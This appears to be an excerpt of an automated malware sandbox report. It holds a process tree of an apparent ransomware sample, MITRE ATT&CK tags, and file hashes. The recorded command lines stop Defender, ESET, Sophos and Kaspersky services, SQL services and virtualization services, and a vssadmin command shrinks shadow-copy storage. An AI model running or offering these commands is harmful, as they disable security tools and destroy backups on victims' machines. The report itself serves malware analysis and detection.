    [5] C:\Windows\system32\net1.exe  |  C:\Windows\system32\net1 stop "NetMsmqActivator"  |  PID:1416

[3] C:\Windows\system32\cmd.exe  |  C:\Windows\system32\cmd.exe /c net stop "EhttpSrv"  |  PID:4568
  [4] C:\Windows\system32\net.exe  |  net stop "EhttpSrv"  |  PID:4012
    [5] C:\Windows\system32\net1.exe  |  C:\Windows\system32\net1 stop "EhttpSrv"  |  PID:4588

[3] C:\Windows\system32\cmd.exe  |  C:\Windows\system32\cmd.exe /c net stop "ekrn"  |  PID:4196
  [4] C:\Windows\system32\net.exe  |  net stop "ekrn"  |  PID:1368
    [5] C:\Windows\system32\net1.exe  |  C:\Windows\system32\net1 stop "ekrn"  |  PID:4004

[3] C:\Windows\system32\cmd.exe  |  C:\Windows\system32\cmd.exe /c net stop "ESHASRV"  |  PID:4200
  [4] C:\Windows\system32\net.exe  |  net stop "ESHASRV"  |  PID:3972
    [5] C:\Windows\system32\net1.exe  |  C:\Windows\system32\net1 stop "ESHASRV"  |  PID:1556

[3] C:\Windows\system32\cmd.exe  |  C:\Windows\system32\cmd.exe /c net stop "MSSQL$SOPHOS"  |  PID:4432
  [4] C:\Windows\system32\net.exe  |  net stop "MSSQL$SOPHOS"  |  PID:4632
    [5] C:\Windows\system32\net1.exe  |  C:\Windows\system32\net1 stop "MSSQL$SOPHOS"  |  PID:2636

[3] C:\Windows\system32\cmd.exe  |  C:\Windows\system32\cmd.exe /c net stop "SQLAgent$SOPHOS"  |  PID:1388
  [4] C:\Windows\system32\net.exe  |  net stop "SQLAgent$SOPHOS"  |  PID:5028
    [5] C:\Windows\system32\net1.exe  |  C:\Windows\system32\net1 stop "SQLAgent$SOPHOS"  |  PID:904

[3] C:\Windows\system32\cmd.exe  |  C:\Windows\system32\cmd.exe /c net stop "AVP"  |  PID:4528
    - Suspicious use of AdjustPrivilegeToken
  [4] C:\Windows\system32\net.exe  |  net stop "AVP"  |  PID:416
    [5] C:\Windows\system32\net1.exe  |  C:\Windows\system32\net1 stop "AVP"  |  PID:3932

[3] C:\Windows\system32\cmd.exe  |  C:\Windows\system32\cmd.exe /c net stop "klnagent"  |  PID:4756
  [4] C:\Windows\system32\net.exe  |  net stop "klnagent"  |  PID:4804
    [5] C:\Windows\system32\net1.exe  |  C:\Windows\system32\net1 stop "klnagent"  |  PID:1268

[3] C:\Windows\system32\cmd.exe  |  C:\Windows\system32\cmd.exe /c net stop "MSSQL$SQLEXPRESS"  |  PID:1220
  [4] C:\Windows\system32\net.exe  |  net stop "MSSQL$SQLEXPRESS"  |  PID:4500
    [5] C:\Windows\system32\net1.exe  |  C:\Windows\system32\net1 stop "MSSQL$SQLEXPRESS"  |  PID:5060

[3] C:\Windows\system32\cmd.exe  |  C:\Windows\system32\cmd.exe /c net stop "SQLAgent$SQLEXPRESS"  |  PID:5036
  [4] C:\Windows\system32\net.exe  |  net stop "SQLAgent$SQLEXPRESS"  |  PID:4836
    [5] C:\Windows\system32\net1.exe  |  C:\Windows\system32\net1 stop "SQLAgent$SQLEXPRESS"  |  PID:940

[3] C:\Windows\system32\cmd.exe  |  C:\Windows\system32\cmd.exe /c net stop "wbengine"  |  PID:2452
  [4] C:\Windows\system32\net.exe  |  net stop "wbengine"  |  PID:4820
    [5] C:\Windows\system32\net1.exe  |  C:\Windows\system32\net1 stop "wbengine"  |  PID:5008

[3] C:\Windows\system32\cmd.exe  |  C:\Windows\system32\cmd.exe /c net stop "HvHost"  |  PID:2304
  [4] C:\Windows\system32\net.exe  |  net stop "HvHost"  |  PID:2024
    [5] C:\Windows\system32\net1.exe  |  C:\Windows\system32\net1 stop "HvHost"  |  PID:900

[3] C:\Windows\system32\cmd.exe  |  C:\Windows\system32\cmd.exe /c net stop "vmickvpexchange"  |  PID:4792
  [4] C:\Windows\system32\net.exe  |  net stop "vmickvpexchange"  |  PID:4772
    [5] C:\Windows\system32\net1.exe  |  C:\Windows\system32\net1 stop "vmickvpexchange"  |  PID:2864

[3] C:\Windows\system32\cmd.exe  |  C:\Windows\system32\cmd.exe /c net stop "vmicguestinterface"  |  PID:3152
  [4] C:\Windows\system32\net.exe  |  net stop "vmicguestinterface"  |  PID:680
    [5] C:\Windows\system32\net1.exe  |  C:\Windows\system32\net1 stop "vmicguestinterface"  |  PID:1844

[3] C:\Windows\system32\cmd.exe  |  C:\Windows\system32\cmd.exe /c net stop "vmicshutdown"  |  PID:852
  [4] C:\Windows\system32\net.exe  |  net stop "vmicshutdown"  |  PID:1232
    [5] C:\Windows\system32\net1.exe  |  C:\Windows\system32\net1 stop "vmicshutdown"  |  PID:1384

[3] C:\Windows\system32\cmd.exe  |  C:\Windows\system32\cmd.exe /c net stop "vmicheartbeat"  |  PID:1908
  [4] C:\Windows\system32\net.exe  |  net stop "vmicheartbeat"  |  PID:4892
      - Suspicious use of AdjustPrivilegeToken
    [5] C:\Windows\system32\net1.exe  |  C:\Windows\system32\net1 stop "vmicheartbeat"  |  PID:3240
        - Suspicious use of AdjustPrivilegeToken

[3] C:\Windows\system32\cmd.exe  |  C:\Windows\system32\cmd.exe /c net stop "vmcompute"  |  PID:4888
  [4] C:\Windows\system32\net.exe  |  net stop "vmcompute"  |  PID:2724
    [5] C:\Windows\system32\net1.exe  |  C:\Windows\system32\net1 stop "vmcompute"  |  PID:1184

[3] C:\Windows\system32\cmd.exe  |  C:\Windows\system32\cmd.exe /c net stop "vmicvmsession"  |  PID:4884
  [4] C:\Windows\system32\net.exe  |  net stop "vmicvmsession"  |  PID:2768
    [5] C:\Windows\system32\net1.exe  |  C:\Windows\system32\net1 stop "vmicvmsession"  |  PID:2060

[3] C:\Windows\system32\cmd.exe  |  C:\Windows\system32\cmd.exe /c net stop "vmicrdv"  |  PID:4512
  [4] C:\Windows\system32\net.exe  |  net stop "vmicrdv"  |  PID:984
    [5] C:\Windows\system32\net1.exe  |  C:\Windows\system32\net1 stop "vmicrdv"  |  PID:3496

[3] C:\Windows\system32\cmd.exe  |  C:\Windows\system32\cmd.exe /c net stop "vmictimesync"  |  PID:4880
  [4] C:\Windows\system32\net.exe  |  net stop "vmictimesync"  |  PID:4896
    [5] C:\Windows\system32\net1.exe  |  C:\Windows\system32\net1 stop "vmictimesync"  |  PID:268

[3] C:\Windows\system32\cmd.exe  |  C:\Windows\system32\cmd.exe /c net stop "vmicvss"  |  PID:3120
  [4] C:\Windows\system32\net.exe  |  net stop "vmicvss"  |  PID:2020
    [5] C:\Windows\system32\net1.exe  |  C:\Windows\system32\net1 stop "vmicvss"  |  PID:4876

[3] C:\Windows\system32\cmd.exe  |  C:\Windows\system32\cmd.exe /c net stop "VMAuthdService"  |  PID:3148
  [4] C:\Windows\system32\net.exe  |  net stop "VMAuthdService"  |  PID:3724
      - Drops startup file
    [5] C:\Windows\system32\net1.exe  |  C:\Windows\system32\net1 stop "VMAuthdService"  |  PID:3392

[3] C:\Windows\system32\cmd.exe  |  C:\Windows\system32\cmd.exe /c net stop "VMnetDHCP"  |  PID:2236
  [4] C:\Windows\system32\net.exe  |  net stop "VMnetDHCP"  |  PID:4240
    [5] C:\Windows\system32\net1.exe  |  C:\Windows\system32\net1 stop "VMnetDHCP"  |  PID:2124

[3] C:\Windows\system32\cmd.exe  |  C:\Windows\system32\cmd.exe /c net stop "VMware NAT Service"  |  PID:2632
  [4] C:\Windows\system32\net.exe  |  net stop "VMware NAT Service"  |  PID:4364
    [5] C:\Windows\system32\net1.exe  |  C:\Windows\system32\net1 stop "VMware NAT Service"  |  PID:3904

[3] C:\Windows\system32\cmd.exe  |  C:\Windows\system32\cmd.exe /c net stop "VMUSBArbService"  |  PID:3324
  [4] C:\Windows\system32\net.exe  |  net stop "VMUSBArbService"  |  PID:2984
    [5] C:\Windows\system32\net1.exe  |  C:\Windows\system32\net1 stop "VMUSBArbService"  |  PID:1464

[3] C:\Windows\system32\cmd.exe  |  C:\Windows\system32\cmd.exe /c net stop "VMwareHostd"  |  PID:3228
  [4] C:\Windows\system32\net.exe  |  net stop "VMwareHostd"  |  PID:2324
    [5] C:\Windows\system32\net1.exe  |  C:\Windows\system32\net1 stop "VMwareHostd"  |  PID:3984
        - Suspicious use of AdjustPrivilegeToken

[3] C:\Windows\system32\cmd.exe  |  C:\Windows\system32\cmd.exe /c net stop "Sense"  |  PID:3620
    - Adds Run key to start application
  [4] C:\Windows\system32\net.exe  |  net stop "Sense"  |  PID:1940
    [5] C:\Windows\system32\net1.exe  |  C:\Windows\system32\net1 stop "Sense"  |  PID:2716

[3] C:\Windows\system32\cmd.exe  |  C:\Windows\system32\cmd.exe /c net stop "WdNisSvc"  |  PID:4296
  [4] C:\Windows\system32\net.exe  |  net stop "WdNisSvc"  |  PID:4420
    [5] C:\Windows\system32\net1.exe  |  C:\Windows\system32\net1 stop "WdNisSvc"  |  PID:4376

[3] C:\Windows\system32\cmd.exe  |  C:\Windows\system32\cmd.exe /c net stop "WinDefend"  |  PID:5024
  [4] C:\Windows\system32\net.exe  |  net stop "WinDefend"  |  PID:4120
    [5] C:\Windows\system32\net1.exe  |  C:\Windows\system32\net1 stop "WinDefend"  |  PID:2240

[1] C:\Windows\system32\vssadmin.exe  |  vssadmin resize shadowstorage /for=W:\ /on=W:\ /maxsize=401MB  |  PID:3796
    - Enumerates connected drives
    - Interacts with shadow copies

[1] C:\Windows\system32\vssvc.exe  |  C:\Windows\system32\vssvc.exe  |  PID:2008
    - Suspicious use of AdjustPrivilegeToken
Network
MITRE ATT&CK Enterprise v6
Persistence
- Hidden Files and Directories (1)
- Registry Run Keys / Startup Folder (1)
- Scheduled Task (1)
Defense Evasion
- Bypass User Account Control (1)
- Disabling Security Tools (1)
- File Deletion (2)
- Hidden Files and Directories (1)
- Indicator Removal on Host (1)
- Modify Registry (2)
Downloads

Filesize 8KB
MD5 53dab3a3443e1439e53220aff1e7490f
SHA1 4222d1841951b87cd54516d3381f8358791fd988
SHA256 ca61149d672c2c233a8927ae1e50471cb69449992b3e13c7c74398bd17f5b8c4
SHA512 5ef1be8a904ef4dc47576574b709a72f060357a5ea6b2e7cc16f4be8f7197a142da7f7a61583fa20012986ea008b53f08eda2a985ef45de47b5eb3eaf40e82f5

Filesize 621B
MD5 edb2c94c58363c1d8e428506e28d669f
SHA1 50041c9b823d76a932788d553b07cc25297a0ff7
SHA256 428ad5fade332e703436d51e6b11ab06fad9e57089088b99e9b53372351b6efc
SHA512 024fd02ed3327cd59c6f1cbe24786f27852278d67354c5edf2e5acb1f58bbf0aa1d8114cbdd0b02904f98c5f02393c1f3887a924e6fdb4e75b53db29ff50ed1a

Filesize 320KB
MD5 e6fc190168519d6a6c4f1519e9450f0f
SHA1 af2080ddf1064fb80c7b9af942aaabf264441098
SHA256 8199ef63e0058be6217ec8392258fbe7fac9fb556b8e87f40a3a45835f424980
SHA512 4522d4e3f8a38dbceb30d09ea04ceeacc33bb273d702d706be68405cd4c9492f862f4ae741f4e0140b54203b3db521e96663f9757bb241b1ac63c1eda3ebb6ba

Filesize 14B
MD5 db84d0324aeb1f2a9c496b293adef33d
SHA1 79bc8117faef8c4f2273358b43c1280f0e70deea
SHA256 9c41ce9bd8f0cb76d508a6a5d81ddb65524ff158028ec13c0d93cbb22dcf91ab
SHA512 e12798d4a2260cc0bc09853359434813a1103b1517537e4129b9dcc06674b26359bb5815db56b04e2ef44667ab686618a164d7243e0ac609c6b62ddb88e3f407

Filesize 1KB
MD5 99a04b59f115e55249d7323a446446df
SHA1 942399e4cb0d49fcf386b352f5bbc9f4ce4ae832
SHA256 af9eb20d3ce3aa9fc78c257c5b7c3e77c5d812d99a870283cf6970a7b2bfd3e3
SHA512 25a11ce27c1b15f0df3eb1c91ff04b095297d4a2ab14f6e681b68b60855e8d0386892a5bf6580db212484277c6d7aa4b3fedeeb74298f97cdd41b327a6bba22d

Filesize 204B
MD5 07c7fc3eb4a68e9e968c0a7e22fb1092
SHA1 9d3804e00636a82d6d74812d6c6a4dcecaf5ef5d
SHA256 0f880c9481db083d9872faec40139e2a2b99eeae1fa98717634a51b84aeeb99b
SHA512 60d1a7f2620b526bec9378962566966deb53238a22610d5a728a0118d8f6ca2153c69dca6dedd87248f967736b1c31329adc07c930e5ccac467436d264eb580f

Filesize 30KB
MD5 33f7fc301be9d39fcb474fb8b1e5f42e
SHA1 a3bf9ddb2ac53bc4b12b249825189a7c7a07b766
SHA256 99cd579177b2480dab17d125bcabe16f503b467208c2568c5564d13ffb457d03
SHA512 6cf0f2a65cc9d001087b8a685f1199ece6cd6e25f91b421a5a176ed8a1578e9b5da5fd4cd1708fc3639c30f1724e238ad6d4a2b09d45b53737468b31ddf50d00

Filesize 78KB
MD5 3257eb22824b57fe3d58074bca3128d3
SHA1 6f60ff4e7419ccdbc3d0dedc8474a0722d7d0a97
SHA256 5afba257ff405ceb733b2b6f270a16c8e0fffe92e6c91c6554a2ea4706e8c3ad
SHA512 7b41c8714aa64bd5a3a9e782a5bda8875882182863c9dd11273c168ef2b064f2c31c6c0e9d30f9db7ff99dae0542773f9a8ef995830c427d167120711ab4878d